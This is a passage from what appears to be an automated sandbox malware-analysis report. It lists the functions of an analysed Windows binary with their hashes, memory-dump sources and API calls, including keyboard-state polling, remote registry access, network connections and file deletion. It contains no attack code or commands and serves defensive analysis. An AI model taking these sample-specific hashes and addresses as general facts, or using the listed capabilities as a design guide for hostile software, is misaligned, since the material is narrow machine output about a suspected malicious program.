                                                                                                                  • Opcode ID: 83141ae6ef93bc0bdc21310ec56b11fcb745020a4003262b27b7bafc43c6609e
                                                                                                                  • Instruction ID: b6b537321600c4259d03e76ada3928273591c12dfda67f9e7b9cad692dd0e311
                                                                                                                  • Opcode Fuzzy Hash: 83141ae6ef93bc0bdc21310ec56b11fcb745020a4003262b27b7bafc43c6609e
                                                                                                                  • Instruction Fuzzy Hash: 42211932840319FBCF11EB90DC06EEE7775EF14700F008459B51AA11A2EA75AB54EB71
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 00DBD567
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00DBD589
                                                                                                                  • __swprintf.LIBCMT ref: 00DBD5DC
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD68D
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD6AB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2116804098-2391861430
                                                                                                                  • Opcode ID: 060806b37b3c60fe7c6ea03a69721c31857a745cf1bb36d9257819461d1fe0cb
                                                                                                                  • Instruction ID: 682148a4dace58ff4d989388a24915e430290c6c906665b1c706ef9298bea30b
                                                                                                                  • Opcode Fuzzy Hash: 060806b37b3c60fe7c6ea03a69721c31857a745cf1bb36d9257819461d1fe0cb
                                                                                                                  • Instruction Fuzzy Hash: 20514D72900209EACB15EBA0DD86EEEB779EF14300F108469B10AB21A1FA715F58DF71
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00DBD37F
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DBD3A0
                                                                                                                  • __swprintf.LIBCMT ref: 00DBD3F3
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD499
                                                                                                                  • _wprintf.LIBCMT ref: 00DBD4B7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2116804098-3420473620
                                                                                                                  • Opcode ID: a0d81017fa381f2af316d18e3ac85c86348a170d042ede8545186c6345f6e240
                                                                                                                  • Instruction ID: 157df936d2832b9fca91784bf2563e5280afdffc3f043308ba4bf0e3a0bd3645
                                                                                                                  • Opcode Fuzzy Hash: a0d81017fa381f2af316d18e3ac85c86348a170d042ede8545186c6345f6e240
                                                                                                                  • Instruction Fuzzy Hash: 12515372900209EACB15EBA0DD86EEEB779EF14700F108469B10AB2161FB756F58DF71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • _memset.LIBCMT ref: 00DAAF74
                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DAAFA9
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DAAFC5
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DAAFE1
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DAB00B
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00DAB033
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DAB03E
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DAB043
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                  • API String ID: 1411258926-22481851
                                                                                                                  • Opcode ID: acc19a12d9ae02d6f70275bce02659e89fdb918d64afaa3e27bc53625ce0e7b6
                                                                                                                  • Instruction ID: fa8bd19aa567c0b075bb57a2827e02dc7f6ce53e1fccc5bf27b67810efd85458
                                                                                                                  • Opcode Fuzzy Hash: acc19a12d9ae02d6f70275bce02659e89fdb918d64afaa3e27bc53625ce0e7b6
                                                                                                                  • Instruction Fuzzy Hash: CF410776810229AACF15EBA4DC85DEEB779FF04700F04812AF905A2161EB719E05CF70
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00DB7226
                                                                                                                  • __swprintf.LIBCMT ref: 00DB7233
                                                                                                                    • Part of subcall function 00D9234B: __woutput_l.LIBCMT ref: 00D923A4
                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00DB725D
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00DB7269
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00DB7276
                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00DB7296
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00DB72A8
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00DB72B7
                                                                                                                  • LockResource.KERNEL32(?), ref: 00DB72C3
                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00DB7322
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                  • String ID: L6
                                                                                                                  • API String ID: 1433390588-4199682035
                                                                                                                  • Opcode ID: 2761159362a8fb66b037202fea2a08efda08a401ee1e6db5ee5dc6339cba215d
                                                                                                                  • Instruction ID: 9a560612569309a433962258ffa52c63669f4f893af0c1616bd401978d0b991e
                                                                                                                  • Opcode Fuzzy Hash: 2761159362a8fb66b037202fea2a08efda08a401ee1e6db5ee5dc6339cba215d
                                                                                                                  • Instruction Fuzzy Hash: 2B318DB190425AEBDB019F619C89AFF7BAAEF44341B148419FD12E2250E734D950DAB4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DB843F
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DB8455
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DB8466
                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DB8478
                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DB8489
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$_memmove
                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                  • Opcode ID: a8272fdae11ec8b4d4a52fef862f689079f1a193512a0ef42ef24f442f64c86b
                                                                                                                  • Instruction ID: 1087c2764b2724f15013ae4739d32d731e5a7ed5bd821281f028743309367b6d
                                                                                                                  • Opcode Fuzzy Hash: a8272fdae11ec8b4d4a52fef862f689079f1a193512a0ef42ef24f442f64c86b
                                                                                                                  • Instruction Fuzzy Hash: F511C86164026D79D724A7B1DC46DFF7B7CEB91B00F04481AB412B60D0EEA05A44CAB0
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00DB809C
                                                                                                                    • Part of subcall function 00D8E3A5: timeGetTime.WINMM(?,75A4B400,00DE6163), ref: 00D8E3A9
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00DB80C8
                                                                                                                  • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00DB80EC
                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00DB810E
                                                                                                                  • SetActiveWindow.USER32 ref: 00DB812D
                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DB813B
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DB815A
                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00DB8165
                                                                                                                  • IsWindow.USER32 ref: 00DB8171
                                                                                                                  • EndDialog.USER32(00000000), ref: 00DB8182
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                  • String ID: BUTTON
                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                  • Opcode ID: 0252df46216f60b782377d64102a8b30175b0457c6d82cbde0464ee9a9f6a95c
                                                                                                                  • Instruction ID: 7184918e17f48173b55175faf8fff6da56d1a766bb58ca263cc868753c839be3
                                                                                                                  • Opcode Fuzzy Hash: 0252df46216f60b782377d64102a8b30175b0457c6d82cbde0464ee9a9f6a95c
                                                                                                                  • Instruction Fuzzy Hash: A2211D70200309EFE7126B76AC89E663F6FE755389B084115F526D6261CE768D09DB31
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DBC6A0: __time64.LIBCMT ref: 00DBC6AA
                                                                                                                    • Part of subcall function 00D741A7: _fseek.LIBCMT ref: 00D741BF
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DBC96F
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcscpy.LIBCMT ref: 00DBC982
                                                                                                                  • _wcscat.LIBCMT ref: 00DBC995
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DBC9BA
                                                                                                                  • _wcscat.LIBCMT ref: 00DBC9D0
                                                                                                                  • _wcscat.LIBCMT ref: 00DBC9E3
                                                                                                                    • Part of subcall function 00DBC6E4: _memmove.LIBCMT ref: 00DBC71D
                                                                                                                    • Part of subcall function 00DBC6E4: _memmove.LIBCMT ref: 00DBC72C
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBC92A
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF49
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF5C
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DBCB8D
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DBCC24
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DBCC3A
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DBCC4B
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DBCC5D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 152968663-0
                                                                                                                  • Opcode ID: 511b8e962589e8f52b039ff048e177f95266ca507c84b654f812471de0b9a6f4
                                                                                                                  • Instruction ID: ef49fe4aca5bd5518818dc1974d1657398d2a68910a676495a6e50183f65c218
                                                                                                                  • Opcode Fuzzy Hash: 511b8e962589e8f52b039ff048e177f95266ca507c84b654f812471de0b9a6f4
                                                                                                                  • Instruction Fuzzy Hash: E1C10CB1900219AEDF11DF95CC81EEEBBB9EF59310F0040AAF619E6151E7709A84CF75
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3566271842-0
                                                                                                                  • Opcode ID: 9adbc361ee682d8c9feeb0598374fca77206f505f11a31683e242103412d03cf
                                                                                                                  • Instruction ID: 9fc002de2751ad29c6fbf88495d95fb3b5ed80adacf72d6e0a23c8dc8a7572d5
                                                                                                                  • Opcode Fuzzy Hash: 9adbc361ee682d8c9feeb0598374fca77206f505f11a31683e242103412d03cf
                                                                                                                  • Instruction Fuzzy Hash: 5671DC75900219EFDB10DFA4C888E9EB7B9EF48314F148499E919EB251DB74AE40CFA0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB3908
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00DB3973
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00DB3993
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00DB39AA
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00DB39D9
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00DB39EA
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00DB3A16
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00DB3A24
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00DB3A4D
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00DB3A5B
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00DB3A84
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00DB3A92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 3a8b7e3ec5b064e1ebd247907d539d35d6b55a508c79efd5936f35463f97f741
                                                                                                                  • Instruction ID: 3b221b92ac833e3f05e5eedc481e41280527ea37bda4ecd42888dcc22b2b4ca6
                                                                                                                  • Opcode Fuzzy Hash: 3a8b7e3ec5b064e1ebd247907d539d35d6b55a508c79efd5936f35463f97f741
                                                                                                                  • Instruction Fuzzy Hash: 8151E724A04784A9FB35EBA488117EABFB49F01740F4C858DD5C35A1C3DA94DB8CDB72
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00DAFB19
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DAFB2B
                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00DAFB89
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00DAFB94
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DAFBA6
                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00DAFBFC
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00DAFC0A
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DAFC1B
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00DAFC5E
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00DAFC6C
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DAFC89
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00DAFC96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3096461208-0
                                                                                                                  • Opcode ID: 406653647ead01cc550e8114a8b412ee84f545725dec6b9c52facc5cf0c2caaf
                                                                                                                  • Instruction ID: 78249b7066a8268ebc827b8b6291559bb9c377c7648ee11111a2fdddc12caa26
                                                                                                                  • Opcode Fuzzy Hash: 406653647ead01cc550e8114a8b412ee84f545725dec6b9c52facc5cf0c2caaf
                                                                                                                  • Instruction Fuzzy Hash: 1A510F71B00309AFDB18CFA9DD95ABEBBBAEB89311F148569B915D7390D7709D00CB20
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00D8B067
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259745315-0
                                                                                                                  • Opcode ID: 0f251ee63f48c874216cab84aabe8c1a25f98d58f3cab7826aec07b16912cb5b
                                                                                                                  • Instruction ID: 8d9c740a1e58449a016648a9d47f53818400e0c21f6d9f518673aa64f674df1b
                                                                                                                  • Opcode Fuzzy Hash: 0f251ee63f48c874216cab84aabe8c1a25f98d58f3cab7826aec07b16912cb5b
                                                                                                                  • Instruction Fuzzy Hash: BE419031100654AFDB246F28DC88BBA3B66AB46731F194266FD658A2E5D7318C41DB31
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
